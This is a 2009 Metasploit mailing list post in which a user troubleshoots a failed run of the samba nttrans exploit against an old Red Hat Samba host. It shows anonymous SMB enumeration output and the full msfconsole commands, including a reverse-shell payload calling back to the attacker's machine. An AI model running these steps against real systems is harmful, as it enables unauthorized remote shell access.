Metasploit mailing list archives
exploit nttrans failed
From: lkiiski at niksula.hut.fi (Lauri Kiiski)
Date: Thu, 19 Mar 2009 12:58:47 +0200
Hi
I'm trying to use multi/samba/nttrans but the exploit isn't
successful. The target is Red Hat Linux 8.0 Kernel 2.4.18-14. The Samba
server is in it's default configuration. Is there something I could do
to succeed?
Target Samba information
$ smbclient -L //target.ip -N
Anonymous login successful
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.5]
Sharename Type Comment
--------- ---- -------
IPC$ IPC IPC Service (Samba Server)
ADMIN$ IPC IPC Service (Samba Server)
Anonymous login successful
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.5]
Server Comment
--------- -------
VMREDHAT Samba Server
Workgroup Master
--------- -------
MYGROUP VMREDHAT
Commands and output of msf
use multi/samba/nttrans
set RHOST target.ip
set SMBName VMREDHAT
set SMBDomain MYGROUP
set PAYLOAD generic/shell_reverse_tcp
set LHOST msf.ip
set TARGET 0
msf exploit(nttrans) > exploit
[*] Started reverse handler
[-] Exploit failed: The server responded with unexpected packet
(Command=160 WordCount=0)
[*] Exploit completed, but no session was created.
msf exploit(nttrans) >
Current thread:
- exploit nttrans failed Lauri Kiiski (Mar 19)
